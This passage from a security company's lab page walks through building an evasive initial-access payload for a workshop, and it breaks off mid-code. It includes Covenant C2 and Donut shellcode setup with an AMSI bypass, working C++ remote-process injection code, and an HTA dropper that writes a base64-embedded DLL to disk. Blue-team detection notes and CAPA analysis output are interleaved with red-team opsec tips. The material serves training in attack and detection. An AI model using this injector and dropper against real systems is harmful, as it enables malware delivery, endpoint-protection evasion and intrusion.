{"id":7736,"date":"2021-04-07T09:00:00","date_gmt":"2021-04-07T08:00:00","guid":{"rendered":"https:\/\/www.withsecure.com\/?post_type=lab_item&#038;p=7736"},"modified":"2026-05-22T12:53:32","modified_gmt":"2026-05-22T11:53:32","slug":"attack-detection-fundamentals-2021-windows-lab-1","status":"publish","type":"lab_item","link":"https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-1\/","title":{"rendered":"Attack Detection Fundamentals 2021: Windows &#8211; Lab #1"},"content":{"rendered":"<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 wp-block-one-column-block--meta-sharing layout--spacing-xxxxl-top layout--spacing-xl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                            <div class='wp-block-one-column-block__meta-sharing-grid'><div class=\"wp-component-content wp-component-content--default wp-block-one-column-block__content fade-in\">\n            <h1 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Attack Detection Fundamentals 2021: Windows &#8211; <span class=\"blue-text\">Lab #1<\/span><\/h1>                    <div class=\"wp-component-content__inner\">\n                                                    <div class=\"wp-component-content__meta\">\n                                                                            <span class=\"wp-component-content__meta-categories\">\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Attack Detection                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Offensive security                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Software Protection                                    <\/span>\n                                                            <\/span>\n                                                                                                    <span class=\"wp-component-content__meta-date\">\n                                07 April, 2021                            <\/span>\n                                                                    <\/div>\n                                            <\/div>\n                <\/div><section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--content-1 wp-block-sharing-icons--disable-container wp-block-one-column-block__sharing fade-in wp-block-one-column-block__sharing fade-in\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-1\/&#038;title=Attack%20Detection%20Fundamentals%202021:%20Windows%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Share on Linkedin\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals 2021: Windows &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-1\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Share on Twitter\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n<\/div>                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                                    <div class=\"wp-component-image__wrapper wp-block-one-column-block__image fade-in\">\n                    <figure class=\"wp-component-image__figure\">\n                                            <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp\" class=\"wp-component-image\n                            wp-component-image--desktop\n                            wp-component-image--mobile\n                            wp-component-image--ratio-content-25-1 wp-component-image--fit-cover\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp 1200w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-300x200.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-1024x683.jpg.webp 1024w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-447x298.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-219x146.jpg.webp 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                                                    <\/figure>\n                    <\/div>\n                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-two-column-block edwp-block js-wp-block-two-column-block wp-block-two-column-block--content-1 wp-block-two-column-block__left--align-y-top wp-block-two-column-block__right--align-y-top wp-block-two-column-block--split-sidebar layout--none-top layout--spacing-xxxl-bottom\"\n    data-block-id=\"block_6469fafc2e230f141b5765bd1f65c225\"\n    >\n    <div class=\"wp-block-two-column-block__container row-load\">\n                                                        <div class=\"wp-block-two-column-block__left\">\n                                    <div class=\"wp-component-authors-list wp-block-two-column-block__authors\">\n                    <p class=\"wp-component-authors-list__title\">\n                Authors            <\/p>\n        \n        <div class=\"wp-component-authors-list__items\">\n                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Alfie Champion<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Riccardo Ancarani<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                    <\/div>\n\n            <\/div>\n<nav\n    class=\"wp-component-content-navigation wp-block-two-column-block__content-nav js-content-navigation\"\n    data-bem-base=\"wp-component-content-navigation\"\n    data-nav-column=\"left\"\n    data-nav-type=\"auto\"\n>\n            <p class=\"wp-component-content-navigation__title\">\n            Content        <\/p>\n    \n    <div class=\"wp-component-content-navigation__mobile\">\n        <label class=\"wp-component-content-navigation__mobile-label\">\n            <span class=\"wp-component-content-navigation__mobile-label-text\">\n                Content navigation            <\/span>\n            <select class=\"wp-component-content-navigation__select js-content-navigation-select\">\n                <option value=\"\">\n                    Select a section                <\/option>\n                            <\/select>\n        <\/label>\n    <\/div>\n\n    <div class=\"wp-component-content-navigation__desktop\">\n        <div class=\"wp-component-content-navigation__list-wrapper\">\n            <span\n                class=\"wp-component-content-navigation__indicator js-content-navigation-indicator\"\n                aria-hidden=\"true\"\n            ><\/span>\n            <ul class=\"wp-component-content-navigation__list js-content-navigation-list\">\n                            <\/ul>\n        <\/div>\n    <\/div>\n<\/nav>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__hide-mobile wp-block-two-column-block__share wp-block-two-column-block__hide-mobile\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-1\/&#038;title=Attack%20Detection%20Fundamentals%202021:%20Windows%20&#8211;%20Lab%20#1\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Share on Linkedin\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals 2021: Windows &#8211; Lab #1&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-1\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Share on Twitter\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                                                <div class=\"wp-block-two-column-block__right\">\n                                <div class=\"wp-component-paragraph wp-block-two-column-block__paragraph \">\n    <p>In the first part of WithSecure Consulting&#x27;s Attack Detection Fundamentals workshop series for 2021, we covered advanced defense evasion and credential access techniques targeting Windows endpoints.  This included the offensive and defensive use of API hooking, as well as the theft of cookies to enabled &#x27;session hijacking&#x27;.<\/p>\n<p>A recording of the first workshop can be found <a href=\"https:\/\/www.youtube.com\/watch?v=h1OBjMx-R-M\" target=\"_blank\" rel=\"noopener\">here<\/a> and the slides are available <a href=\"https:\/\/www.f-secure.com\/content\/dam\/f-secure\/en\/consulting\/events\/collaterals\/digital\/f-secure_attack-detection-fundamentals-workshop-1-windows_2021-04-07.pdf\" target=\"_blank\" rel=\"noopener\">here<\/a><\/p>\n<p>One of the core concepts of the first workshop was &quot;Defense Evasion&quot; geared towards &quot;Initial Access&quot;. In this lab, we are going to build an initial access payload able to evade the most common endpoint protection mechanisms. More specifically, the outcome of this workshop will be the creation of an HTA file that will do the following:<\/p>\n<ul>\n<li>Drop a DLL on disk and load it via registration-free COM activation<\/li>\n<li>The DLL will spawn a new process and inject an AMSI-bypassing shellcode into it<\/li>\n<\/ul>\n<p>Given this will be quite a detailed walkthrough, we&#x27;ve split it into two parts, where we&#x27;ll improve our initial payload in the <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-2021-windows-lab-2\/\" target=\"_blank\" rel=\"noopener\">next lab<\/a> to include two further defense evasion techniques in API unhooking and ETW bypasses.<\/p>\n<p>For each attacker&#x27;s step, we will analyse the various detection opportunities that either security products or SOC analysts could employ, alongside the most common attacker opsec pitfalls.<\/p>\n<p>Despite the final outcome appearing quite complex, we will try to break it down to its fundamental steps to make it more accessible.<\/p>\n<h2>Required Tools<\/h2>\n<ul>\n<li>1x Windows VM (ideally running <a href=\"https:\/\/docs.microsoft.com\/en-us\/sysinternals\/downloads\/sysmon\" target=\"_blank\" rel=\"noopener\">SysMon<\/a>, SwiftOnSecurity&#x27;s <a href=\"https:\/\/raw.githubusercontent.com\/SwiftOnSecurity\/sysmon-config\/master\/sysmonconfig-export.xml\" target=\"_blank\" rel=\"noopener\">config<\/a> will do)<\/li>\n<li>1x Kali VM (Optional)<\/li>\n<li><a href=\"https:\/\/github.com\/cobbr\/Covenant\" target=\"_blank\" rel=\"noopener\">Covenant<\/a> (we&#x27;re using the dev branch)<\/li>\n<li>Visual Studio 2019 Community Edition<\/li>\n<li><a href=\"https:\/\/github.com\/TheWover\/donut\/\" target=\"_blank\" rel=\"noopener\">Donut<\/a><\/li>\n<li>FireEye&#x27;s CAPA<\/li>\n<li><a href=\"https:\/\/frida.re\/docs\/installation\/\" target=\"_blank\" rel=\"noopener\">Frida for Windows<\/a><\/li>\n<\/ul>\n<p>DISCLAMER: Set up of the tools and the testing environment is not covered comprehensively within this lab. We will assume basic familiarity with Windows command line and the ability of the reader to build the necessary tools.<\/p>\n<h2>Walkthrough<\/h2>\n<h3>Setup<\/h3>\n<p>The first step will be to configure our Command and Control server to accept connections from the implants. We will use the open source Covenant C2 framework for this. We will skip the installation and creation of a standard listener, as it is well covered in the official Covenant Wiki.<\/p>\n<p>Let&#x27;s create a new HTTP listener from the main dashboard:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210323174807172.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>RED TEAM ALERT: In this case we will create a listener that accepts remote connection using the raw IP address, HTTP and with the default communication profile. All those values should be changed during a real operation to maximise the chances of obtaining a remote connection.<\/p>\n<p>BLUE TEAM ALERT: Frameworks are often used in their default configuration by attackers. Default values will leave traces that could be used to spot malicious activities; one example of that is network communication. By default, Covenant and other C2 frameworks like Cobalt Strike have a predefined way of communicating back to their C2 server. By either analysing the traffic with Wireshark or reading the source code, would you be able to spot (and even alert on) the HTTP endpoints used by Covenant?<\/p>\n<p>Now that we have a listener set up, we need what Covenant calls &quot;Launcher&quot;. A Launcher is just a payload that will spawn a &quot;Grunt&quot;; Covenant terminology for an implant. We can create launchers in various formats such as EXEs and DLLs, however we will create a &quot;ShellCode&quot; launcher.<\/p>\n<p>As discussed in the workshop, using shellcodes will give us greater flexibility and stealth when building our initial access payload. So let&#x27;s create a &#x27;.bin&#x27; file fom the Covenant&#x27;s Launcher dashboard and save it on disk.<\/p>\n<p>NOTE: If you save the &#x27;.bin&#x27; file on a Windows endpoint with an antivirus enabled, it might get deleted.<\/p>\n<p>We will not create our shellcode injector just yet, but instead we will rely on hasherezade&#x27;s <a href=\"https:\/\/github.com\/hasherezade\/masm_shc\" target=\"_blank\" rel=\"noopener\">masm_shc<\/a> project. After downloading the binaries, run the &#x27;run_shc64.exe&#x27; binary with the path of the &#x27;.bin&#x27; file as the only command line argument.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/drum-1f941.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Well, you might or might not have obtained a Grunt callback on your system. You might be wondering why. Let&#x27;s start by checking Windows Defender&#x27;s Event Logs:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210323175027915.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>During the production of this content, we observed that the shellcode launcher in Covenant failed to properly disable AMSI. Therefore, depending on the .NET version installed on your system (and when you complete this lab), an AMSI event might have been generated. This is because from .NET 4.8, AMSI supports scanning .NET assemblies that are reflectively loaded using <a href=\"https:\/\/docs.microsoft.com\/en-us\/dotnet\/api\/system.reflection.assembly.load?view=net-5.0\" target=\"_blank\" rel=\"noopener\">&amp;#x27;Assembly.Load()&amp;#x27;<\/a>.<\/p>\n<p>This is something that Covenant abstracted for us, but the shellcode that it was generated was loading the Common Language Runtime (CLR) and reflectively loading the Grunt .NET assembly. All of this was done using the donut tool. It would make sense that AMSI blocked our attack, since Defender was able to scan the raw bytes of the Covenant grunt, despite all of this was happening in memory.<\/p>\n<p>Luckily, an easy fix for this would be to use the latest Donut manually, using its default options. In fact, donut already implements an AMSI bypass using pure C\/ASM, meaning that .NET introspection would not affect it.<\/p>\n<p>Let&#x27;s try again by generating an EXE by choosing &quot;Binary Launcher&quot;:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210323174839716.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>All we need to do now is to execute donut with the default options against the newly generated binary, as shown below:<\/p>\n<pre><code class=\"language-bash\">PS C:\\Users\\Developer\\Desktop\\workshop&gt; C:\\Users\\Developer\\Desktop\\Tools\\donut\\donut.exe -f Z:\\Downloads\\f445fc2af7.exe\n\n[ Donut shellcode generator v0.9.2\n[ Copyright (c) 2019 TheWover, Odzhan\n\n[ Instance type : PIC\n[ Module file : &quot;Z:\\Downloads\\f445fc2af7.exe&quot;\n[ File type : .NET EXE\n[ Target CPU : x86+AMD64\n[ AMSI\/WDLP : continue\n[ Shellcode : &quot;payload.bin&quot;<\/code><\/pre>\n<p>If all went fine, you should now have a Covenant shellcode able to bypass AMSI:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210323175132095.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>A shellcode on its own is not very useful, as it cannot be executed without an additional component that injects it into another process or itself. Let&#x27;s proceed with the creation of a basic DLL implant.<\/p>\n<h2>Weaponisation<\/h2>\n<p>The shellcode injector we will create will be written in C++. We will use Visual Studio for this but any other code editor and compiler that supports C++ on Windows will be sufficient.<\/p>\n<p>Open Visual Studio and do the following:<\/p>\n<ul>\n<li>Create New Project<\/li>\n<li>Select &quot;Dynamic Linked Library (C++)&quot;<\/li>\n<li>Select the folder where to store our code<\/li>\n<\/ul>\n<p>This will create an empty C++ project with a basic code skeleton of a DLL, let&#x27;s start discussing the code.<\/p>\n<p>First of all, at a conceptual level, process injection can be divided into four phases:<\/p>\n<ul>\n<li>Creation or selection of a target process (can be another process or the same process injecting into itself)<\/li>\n<li>Allocation of memory<\/li>\n<li>Writing the shellcode into the allocated memory<\/li>\n<li>Triggering the execution<\/li>\n<\/ul>\n<p>These four fundamental steps can be implemented in different ways, creating many flavours of process injection techniques. It must also be noted that some more advanced techniques are able to avoid one or more of the aforementioned steps, for example avoiding allocating new memory by overwriting existing memory pages (process hollowing is an example of that).<\/p>\n<p>However, we want to keep this relatively simple and therefore we will use the following:<\/p>\n<ul>\n<li>We will create a new process, &#x27;notepad.exe&#x27; initially, in a suspended state<\/li>\n<li>We will allocate memory into the remote process using the &#x27;VirtualAllocEx&#x27; function<\/li>\n<li>The shellcode will be copied using &#x27;WriteProcessMemory&#x27;<\/li>\n<li>Execution will be triggered using &#x27;CreateRemoteThread&#x27;<\/li>\n<\/ul>\n<p>The snippet that can be used to accomplish the above is the following:<\/p>\n<pre><code class=\"language-bash\">PROCESS_INFORMATION pi;\nSTARTUPINFOEXW si;\nSIZE_T attributeSize;\nLPVOID allocatedMemory = NULL;\nWCHAR path[MAX_PATH];\nSIZE_T written = 0;\n\nZeroMemory(&amp;si, sizeof(STARTUPINFOEXA));\nZeroMemory(&amp;pi, sizeof(PROCESS_INFORMATION));\n\nstatic unsigned char shellcode[] = {SHELLCODE};\n\nlstrcpyW(path, L&quot;C:\\\\windows\\\\SYSWOW64\\\\notepad.exe&quot;);\n\nCreateProcess(NULL, path, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &amp;si, &amp;pi);\nSleep(1000);\n\nallocatedMemory = VirtualAllocEx(pi.hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\n\nWriteProcessMemory(pi.hProcess, allocatedMemory, shellcode, sizeof(shellcode), &amp;written);\n\nCreateRemoteThread(pi.hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)allocatedMemory, NULL, NULL, NULL);\n\nResumeThread(pi.hThread);<\/code><\/pre>\n<p>The variable &#x27;shellcode&#x27; should be filled with the bytes of the shellcode that was previously generated. This can be achieved in many ways, but a simple &#x27;hexdump&#x27; command will be sufficient:<\/p>\n<pre><code class=\"language-bash\">hexdump -v -e &#x27;&quot;, &quot;&quot;&quot; 1\/1 &quot;%02x&quot; &quot;&quot;&#x27; payload.bin<\/code><\/pre>\n<p>Compiling it in &quot;Release&quot; mode for x86 will give you a 32 bit DLL that can be executed as follows:<\/p>\n<pre><code class=\"language-bash\">rundll32 simple.dll,test<\/code><\/pre>\n<p>You should obtain an active Grunt session running on your testing VM, if everything went fine. This will be our shellcode injector that will be dropped on disk and loaded by the HTA we will craft shortly&#8230; Yes, we said &quot;drop on disk&quot;.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210323203451900.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Some people might have different opinions, but a well crafted payload can be dropped on disk safely in certain situations. File write operations are so common that it&#x27;s extremely hard for security products to alert just on that.<\/p>\n<p>Now let&#x27;s step back from the offensive side and wear our blue hat for a bit. We will analyse the generated payload and try to understand if it&#x27;s malicious and at a high level what the sample does (spoiler, it&#x27;s malicious).<\/p>\n<p>Let&#x27;s start by executing FireEye&#x27;s CAPA against it:<\/p>\n<pre><code class=\"language-bash\">.\/capa simple-inject.dll\nloading : 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 341\/341 [00:01&lt;00:00, 185.59 rules\/s]\nmatching: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 66\/66 [00:00&lt;00:00, 84.75 functions\/s]\n+------------------------+------------------------------------------------------------------------------------+\n| md5 | f6c34fffec97dca0d47e8943812d07ac |\n| sha1 | 654ccfe60f23cf0ae11d154d4e2f8f9ad18a57b6 |\n| sha256 | 0b5dd9946ab7d50a344bf1b1be706667422b8f3b2bce11a98daf8f38af7e1007 |\n| path | simple-inject.dll |\n+------------------------+------------------------------------------------------------------------------------+\n\n+------------------------+------------------------------------------------------------------------------------+\n| ATT&amp;CK Tactic | ATT&amp;CK Technique |\n|------------------------+------------------------------------------------------------------------------------|\n| DEFENSE EVASION | Process Injection [T1055] |\n| | Virtualization\/Sandbox Evasion::System Checks [T1497.001] |\n| DISCOVERY | Process Discovery [T1057] |\n| EXECUTION | Shared Modules [T1129] |\n+------------------------+------------------------------------------------------------------------------------+\n\n+------------------------------------------------------+------------------------------------------------------+\n| CAPABILITY | NAMESPACE |\n|------------------------------------------------------+------------------------------------------------------|\n| execute anti-VM instructions (2 matches) | anti-analysis\/anti-vm\/vm-detection |\n| contains PDB path | executable\/pe\/pdb |\n| contain a resource (.rsrc) section | executable\/pe\/section\/rsrc |\n| print debug messages | host-interaction\/log\/debug\/write-event |\n| create process | host-interaction\/process\/create |\n| create process suspended | host-interaction\/process\/create |\n| allocate RWX memory | host-interaction\/process\/inject |\n| inject thread | host-interaction\/process\/inject |\n| enumerate processes | host-interaction\/process\/list |\n| terminate process | host-interaction\/process\/terminate |\n| parse PE header | load-code\/pe |\n+------------------------------------------------------+------------------------------------------------------+<\/code><\/pre>\n<p>As we can see, multiple signs of code injection capabilities are present, such as &quot;inject thread&quot; and &quot;allocate RWX memory&quot;:<\/p>\n<pre><code class=\"language-bash\">allocate RWX memory\nnamespace host-interaction\/process\/inject\nauthor moritz.raabe@fireeye.com\nscope basic block\natt&amp;ck Defense Evasion::Process Injection [T1055]\nexamples Practical Malware Analysis Lab 03-03.exe_:0x4010EA, 563653399B82CD443F120ECEFF836EA3678D4CF11D9B351BB737573C2D856299:0x140001ABA\nbasic block @ 0x1000114B\nand:\nor:\napi: kernel32.VirtualAllocEx @ 0x10001213\nor:\nnumber: 0x40 = PAGE_EXECUTE_READWRITE @ 0x10001201\n\ninject thread\nnamespace host-interaction\/process\/inject\nauthor anamaria.martinezgom@fireeye.com\nscope function\natt&amp;ck Defense Evasion::Process Injection [T1055]\nexamples Practical Malware Analysis Lab 12-01.exe_:0x4010D0, 2D3EDC218A90F03089CC01715A9F047F:0x4027CF\nfunction @ 0x10001070\nand:\nor:\napi: kernel32.VirtualAllocEx @ 0x10001213\nmatch: write process memory @ 0x10001070\nor:\napi: kernel32.WriteProcessMemory @ 0x1000125A\nor:\napi: kernel32.CreateRemoteThread @ 0x10001297\noptional:\nor:\napi: kernel32.OpenProcess @ 0x10001153\nnumber: 0x40 = PAGE_EXECUTE_READWRITE @ 0x10001201\nnumber: 0x3000 = MEM_COMMIT or MEM_RESERVE @ 0x10001203<\/code><\/pre>\n<p>We know what the sample does, since we wrote it, but we could go as far as reversing the DLL using <a href=\"https:\/\/www.hex-rays.com\/products\/ida\/\" target=\"_blank\" rel=\"noopener\">IDA<\/a> or <a href=\"https:\/\/ghidra-sre.org\/\" target=\"_blank\" rel=\"noopener\">Ghidra<\/a> and extract the malicious shellcode from it. We could use other triage tools such as <a href=\"https:\/\/www.winitor.com\/\" target=\"_blank\" rel=\"noopener\">PE Studio<\/a> or others to obtain similar results.<\/p>\n<p>In a nutshell, our injector is not opsec safe for a number of reasons:<\/p>\n<ul>\n<li>It does not have any execution guardrail or sandbox check<\/li>\n<li>Has a lot of suspicious imports<\/li>\n<li>Does not have any anti-emulation logic<\/li>\n<li>Does not implement PPID spoofing or apply any process mitigation policy to harden the remote process<\/li>\n<li>Creates a dodgy process (notepad) in a suspended state<\/li>\n<\/ul>\n<p>Additionally, the injection technique we chose is extremely noisy as it will not just trigger userland hooks that might be in place (more on this later), but also kernel callbacks registered by drivers such as Sysmon. The screenshot below is an example of Sysmon Event ID 8, which indicates that a thread was created on a remote process:<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/image-20210323205122099.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h2>HTA to The Masses<\/h2>\n<p>Our DLL is not perfect, but it works. However, it&#x27;s quite hard to deliver one to a target user since no default actions are associated with that file type (double clicking it doesn&#x27;t do much!). Not to mention that most corporate web proxies and mail filters block the DLL file type regardless of being malicious or benign! What is needed is an additional component that will write our DLL on disk and then load it to trigger the execution. HTAs were chosen for this task, but the same concept could be applied with other languages such as VBS and VBA, commonly used for initial access as well.<\/p>\n<p>The first bit of our HTA will actually write our DLL on disk. In fact, we can embed our DLL in a base64 string within the HTA itself and decode it in memory. Including our DLL file in this way is often referred to as a &#x27;dropper&#x27;, where the file is embedded within our initial access payload, as opposed to a downloader, where our HTA would fetch the DLL from an external location. Obtaining the base64 of our DLL is as easy as &#x27;cat simple.dll | base64 -w 0&#x27; and then using the following template:<\/p>\n<pre><code class=\"language-bash\">var shell = new ActiveXObject(&#x27;WScript.Shell&#x27;);\nvar path = shell.ExpandEnvironmentStrings(&quot;%APPDATA%&quot;) + &quot;\\\\&quot;\n\nvar filename = &quot;test.dll&quot;;\n\nvar forReading = 1, forWriting = 2, forAppending = 8;\nvar create = true; \/\/ if file doesn&#x27;t exist, then create it\n\nvar xmlDom = new ActiveXObject(&quot;Microsoft.XMLDOM&quot;);\nvar el = xmlDom.createElement(&quot;tmp&quot;);\nel.dataType = &quot;bin.Base64&quot;\nel.text = &quot;BASE64&quot;; \/\/ the base64 goes here\n\n\/\/ Use a binary stream to write the bytes into\nvar strm = new ActiveXObject(&quot;ADODB.Stream&quot;);\nstrm.Type = 1;\nstrm.Open();\nstrm.Write(el.nodeTypedValue);\n\nstrm.SaveToFile(path + filename, 2);\nstrm.Close();<\/code><\/pre>\n<p>BLUE TEAM ALERT: Having the right telemetry will create multiple detection opportunities for this technique so far. A few examples could include:<\/p>\n<ul>\n<li>A file with DLL extension was written on disk by a known LOLbin (&#x27;Mshta.exe&#x27;), could you tell how frequently that happens in your environment?<\/li>\n<li>A base64 PE was embedded in an HTA, we did not mention how to actually send the HTA to the victim but potentially a proxy would have visibility over the files downloaded form the internet. Is there an automated way of blocking\/alerting on this type of event?<\/li>\n<li>The DLL will call the CreateRemoteThread API, widely used by malware. Does your EDR\/AV prevent or detect on its usage? Would it be possible for you to have the raw telemetry and eventually build detections around it?<\/li>\n<\/ul>\n<p>Now that we have an HTA that can drop a DLL to disk, we need a way of actually getting that DLL loaded somewhere. To do so there are multiple options, such as DLL sideloading or using &#x27;rundll32&#x27; to manually load the library. However, in this example we will use something a bit more complex.<\/p>\n<p>Leo Lobeek&#x27;s research <a href=\"https:\/\/adapt-and-attack.com\/2020\/05\/12\/building-a-com-server-for-initial-execution\/\" target=\"_blank\" rel=\"noopener\">&amp;quot;Building a COM Server for Initial Execution&amp;quot;<\/a> demonstrates how it is possible to load arbitrary DLLs using Registration Free COM. We don&#x27;t need to go into details of COM, but in general a COM object needs to be registered in the system in order to be accessed. However, a particular COM object, ActCtx, can be used to access a COM object without registration on the system, by simply specifying what is called a &quot;manifest&quot;.<\/p>\n<p>We can add the following code to our HTA to do so, following Leo&#x27;s <a href=\"https:\/\/gist.github.com\/leoloobeek\/86ffb76511e3a2e98c5d922501b70b3e\" target=\"_blank\" rel=\"noopener\">example<\/a>:<\/p>\n<pre><code class=\"language-bash\">var manifestXML = &#x27;&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot; standalone=&quot;yes&quot;?&gt;&lt;assembly xmlns=&quot;urn:schemas-microsoft-com:asm.v1&quot; manifestVersion=&quot;1.0&quot;&gt;&lt;assemblyIdentity type=&quot;win32&quot; name=&quot;MyCOMObject&quot; version=&quot;2.2.0.0&quot;\/&gt; &lt;file 